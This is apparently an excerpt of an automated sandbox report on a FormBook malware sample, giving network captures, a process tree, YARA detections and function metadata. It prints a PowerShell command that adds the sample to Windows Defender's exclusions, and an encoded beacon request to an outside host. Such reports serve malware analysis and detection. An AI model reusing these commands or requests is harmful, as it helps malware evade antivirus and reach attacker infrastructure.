dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jan 11, 2025 05:44:41.529727936 CET	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50008	217.160.0.167	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:43.454061985 CET	536	OUT	GET /orhf/?Gr=hRRPf2Bx&Kd=stnCcogzN1x+tq8kUR2EOq3j5SEJj27zufK/G0Bkr3foJj/GHhHN2F3DRNNOABXS75shJsHt1p5hW1Jmsa7+eU3aIqXMhH9SH9XwjZlg2EvO5dx+aK8E5fiy4tUvoUJvjQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.nocoma.berlin User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:44:44.079739094 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Sat, 11 Jan 2025 04:44:43 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Jan 11, 2025 05:44:44.079771996 CET	224	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,6
Jan 11, 2025 05:44:44.079786062 CET	1236	IN	Data Raw: 32 2c 31 31 2e 38 48 37 37 2e 32 63 2e 38 2c 30 2c 31 2e 35 2e 32 2c 31 2e 35 2c 31 2e 35 76 2e 39 63 2d 2e 31 2e 36 2d 2e 32 2c 31 2e 35 2d 31 2e 36 2c 31 2e 35 4d 39 37 2e 32 2c 33 35 2e 32 48 39 35 2e 31 61 32 2e 34 36 2c 32 2e 34 36 2c 30 2c Data Ascii: 2,11.8H77.2c.8,0,1.5.2,1.5,1.5v.9c-.1.6-.2,1.5-1.6,1.5M97.2,35.2H95.1a2.46,2.46,0,0,1-2.2-.9l-6-7.6H85.8v7a1.4,1.4,0,0,1-1.5,1.6H82.8c-1.1,0-1.7-.3-1.7-1.6V13.2c0-1.4.9-1.5,1.7-1.5h6.5c3.7,0,4.7.2,6.1,1.6s1.8,3.6,1.8,6.7c0,2.9-.8,4.7-2.3,5.7a4
Jan 11, 2025 05:44:44.079828024 CET	224	IN	Data Raw: 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2d 32 2e 33 2d 32 2e 33 48 33 2e 36 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 31 2e 33 2c 31 34 56 33 32 2e 37 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 33 2e 36 2c 33 35 48 32 32 2e 34 61 32 Data Ascii: 6,2.26,0,0,0-2.3-2.3H3.6A2.26,2.26,0,0,0,1.3,14V32.7A2.26,2.26,0,0,0,3.6,35H22.4a2.26,2.26,0,0,0,2.3-2.3C24.8,32.7,24.9,14,24.9,14Z" transform="translate(-1.3 -2.3)"/></svg></a></div></div> <div style="c
Jan 11, 2025 05:44:44.079840899 CET	1236	IN	Data Raw: 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b Data Ascii: olor:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-weight: bold;">English</s
Jan 11, 2025 05:44:44.079857111 CET	527	IN	Data Raw: 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 Data Ascii: .</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web è appena stato attivato. Ancora non c'è contenuto.</div> </div>

Target ID:	0
Start time:	23:41:51
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\4p5XLVXJnq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4p5XLVXJnq.exe"
Imagebase:	0xe50000
File size:	837'632 bytes
MD5 hash:	A2E835771815BDCF402A788B18068ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:42:07
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"
Imagebase:	0xc30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:42:07
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\4p5XLVXJnq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4p5XLVXJnq.exe"
Imagebase:	0x6d0000
File size:	837'632 bytes
MD5 hash:	A2E835771815BDCF402A788B18068ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:42:07
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:42:10
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:42:26
Start date:	10/01/2025
Path:	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe"
Imagebase:	0x9d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	23:42:28
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\DpiScaling.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\DpiScaling.exe"
Imagebase:	0xb20000
File size:	77'312 bytes
MD5 hash:	D44D3A0F5E53F6ECC5C6232930CFCC5E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	23:42:44
Start date:	10/01/2025
Path:	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe"
Imagebase:	0x9d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	23:42:56
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	80.5%
Signature Coverage:	0%
Total number of Nodes:	41
Total number of Limit Nodes:	5

Executed Functions

Function 03193E1C Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f45f8ba4c429d789a2e567c1a58212c96a7eca9c44ec0d86da7bcf9b306a2c
Instruction ID: 363c53d2713e54d99a00756952a3008b797c70a93f0845484664abc25b5b7f7e
Opcode Fuzzy Hash: 92f45f8ba4c429d789a2e567c1a58212c96a7eca9c44ec0d86da7bcf9b306a2c
Instruction Fuzzy Hash: 3DD18274A012099FDB04DFA9C584A9EFBF2FF48300F2585A5D408AB365DB35AD91CF90

Function 03196F92 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0fc806b13d0e42a7977f29b6d31a98feff32d11589b159c361e6cec917821e
Instruction ID: 7fd5b261805fa937f3314a18349e9ee506b560e78edde740397648fe740ef875
Opcode Fuzzy Hash: 4e0fc806b13d0e42a7977f29b6d31a98feff32d11589b159c361e6cec917821e
Instruction Fuzzy Hash: E7818E74E012098FDB05DFA9D954AEEBBF2EF88300F24816AD809AB365DB359D45CF50

Function 0319D469 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0319D4F6
GetCurrentThread.KERNEL32 ref: 0319D533
GetCurrentProcess.KERNEL32 ref: 0319D570
GetCurrentThreadId.KERNEL32 ref: 0319D5C9

Strings

4'cq, xrefs: 0319D441

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'cq
API String ID: 2063062207-182294849
Opcode ID: e4302cab63e7965bbd8d1fff16b2141be5cedbcadcfcba13d952fed949adac31
Instruction ID: cce715334afeab4f94140cf1f6144681c5d73b8f95f08cca32b6c6587816817f
Opcode Fuzzy Hash: e4302cab63e7965bbd8d1fff16b2141be5cedbcadcfcba13d952fed949adac31
Instruction Fuzzy Hash: 24616AB090020ACFDB14DFA9E948BAEFBF1FF88314F24C45AE409A7265D7345984CB65

Function 0319D478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0319D4F6
GetCurrentThread.KERNEL32 ref: 0319D533
GetCurrentProcess.KERNEL32 ref: 0319D570
GetCurrentThreadId.KERNEL32 ref: 0319D5C9

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ff046b7b4e23bd59d1ae0517d9b17c3914d9a763e11befcad7a9062565465532
Instruction ID: f70e974a0b84424c2c635243a5962cd0f053e851c36ba1bac880d67d4e9020f0
Opcode Fuzzy Hash: ff046b7b4e23bd59d1ae0517d9b17c3914d9a763e11befcad7a9062565465532
Instruction Fuzzy Hash: 335167B0900309CFEB14DFA9E948B9EBBF1EF88314F24C45AE419A7350D7349984CB65

Function 0319B1E0 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0319B446

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 784383263f9706bd5c7d6dd125b330e9e0695cd5bc8ed9564fde3b3e586ef332
Instruction ID: 22ce7c9c1cc69f01c1dbfb7b3eb83adb91b990fe3881291b2129ef30004631da
Opcode Fuzzy Hash: 784383263f9706bd5c7d6dd125b330e9e0695cd5bc8ed9564fde3b3e586ef332
Instruction Fuzzy Hash: 488167B0A04B058FEB24DF6AE44475ABBF5FF88300F148A6ED44ADBA40D774E945CB91

Function 0319590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031959C9

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4eae65d7ced7ca7a6f34e22f9e18e686ad05807fb98515c163653958b0fa4789
Instruction ID: 4e6945a8b41eaa7bd64f1e071d1bd33f13a8eb363a36f0ec49ec3b9a82968421
Opcode Fuzzy Hash: 4eae65d7ced7ca7a6f34e22f9e18e686ad05807fb98515c163653958b0fa4789
Instruction Fuzzy Hash: AF41EFB0C00619CFDB25CFA9C884B9DBBB2BF49304F24816AD418BB255DBB1694ACF50

Function 0319449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031959C9

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fb363b52e5124021b8536c5bf4aa84bff8cf078218c3cf1f61e3aa87cf70ec9b
Instruction ID: 2d5bbbaa1d77d7aa13d057ef2b6863980ab1fc501a6a95d025ea1e2191bc20db
Opcode Fuzzy Hash: fb363b52e5124021b8536c5bf4aa84bff8cf078218c3cf1f61e3aa87cf70ec9b
Instruction Fuzzy Hash: 1F41EFB0C00719CBDB25CFA9C884B9DBBB6BF49304F60805AD418BB255DB716949CF90

Function 078303F8 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07830497

Memory Dump Source

Source File: 00000000.00000002.2246519653.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_4p5XLVXJnq.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: a8478b3f3a7164396611d83731957688934a3075e8155b454bbcddae4d8eb0b1
Instruction ID: f60bbc1bc24b639c6716cfe9549718ea1eb465fbbefcdfda4c12a44e72b5a3f0
Opcode Fuzzy Hash: a8478b3f3a7164396611d83731957688934a3075e8155b454bbcddae4d8eb0b1
Instruction Fuzzy Hash: A43105B5D0024A9FDB10CF99D884ADEFBF5FB58314F14842AE919A7210D374AA41CFA0

Function 07830400 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07830497

Memory Dump Source

Source File: 00000000.00000002.2246519653.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_4p5XLVXJnq.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 59d9538e20305783e66e28e5145ef793f9d62d26591502fb7bb485c15bed8fc8
Instruction ID: ec6b9c665e790c5044778e997c03f4bbf2bd05c0863a049303c85275cef0d0e5
Opcode Fuzzy Hash: 59d9538e20305783e66e28e5145ef793f9d62d26591502fb7bb485c15bed8fc8
Instruction Fuzzy Hash: 4B21D6B5D002099FDB10CF9AD884ADEFBF5FB58314F14842AE919A7310D774A944CFA0

Function 0319D6B9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319D747

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9cdbe4ff5053d2e01dff16e7dca2ddf4369839c1693fec9e823ed7c904f73fd
Instruction ID: aaeb3748c1c6eb647084356e18a5db6d2614a9fcd055aedef0f30d1cf092b561
Opcode Fuzzy Hash: a9cdbe4ff5053d2e01dff16e7dca2ddf4369839c1693fec9e823ed7c904f73fd
Instruction Fuzzy Hash: 1121E3B59002499FDB10CFAAD984AEEBFF8EB48320F14845AE914A7311D374A954DFA1

Function 0319D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319D747

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bee313668bca69ca5de2ed40a17d1d2b836022c61e95534ffc54efd69abdcef5
Instruction ID: 346ba18afbfc04512a8d302c8115e6c4419305462d12b6eaf1ee28abc20a390b
Opcode Fuzzy Hash: bee313668bca69ca5de2ed40a17d1d2b836022c61e95534ffc54efd69abdcef5
Instruction Fuzzy Hash: 3B21E4B59002499FDB10CF9AD984ADEFBF8FB48310F14841AE914A3310C374A940CF61

Function 0319B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0319B446

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d8c02ce38a1b9c51c6a9bf9759f42b9c290f776637aa4c9c21b9f8e27922b481
Instruction ID: 5e62599774aa4e35fcf2fd69aff091abbb783cf7c5fdc8a794c6405b49723b46
Opcode Fuzzy Hash: d8c02ce38a1b9c51c6a9bf9759f42b9c290f776637aa4c9c21b9f8e27922b481
Instruction Fuzzy Hash: 8A110FB6C00249CFDB20CF9AD844A9EFBF4EB88220F14C45AD829B7200C379A545CFA1

Function 0170D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4807e3afb4608342419c34230fc5d9af54e3c2fdbf8cd666561abb00315c1291
Instruction ID: 9cad4cc9b98d4cc0ed1d8e9b1cedf39ab3c09976bc0c1b6e5d0bc3beb76421f2
Opcode Fuzzy Hash: 4807e3afb4608342419c34230fc5d9af54e3c2fdbf8cd666561abb00315c1291
Instruction Fuzzy Hash: 402105B1104300DFDB12DF88C980B56FFA5EB84324F20C5A9ED090A286C336E406C6A1

Function 0170D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6003a86c0b2b3c743304d913348cb6887a49803e5ef542f44bdd177ff884f277
Instruction ID: 234f88193122e07cfc0e82ca0416f35e550d875e6ae2d47fc9be9c5d80e149ed
Opcode Fuzzy Hash: 6003a86c0b2b3c743304d913348cb6887a49803e5ef542f44bdd177ff884f277
Instruction Fuzzy Hash: F021C471504340DFDB26DF98D980B26FFA5FB88328F34C5A9ED051B296C336D456C6A1

Function 0171D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221595389.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
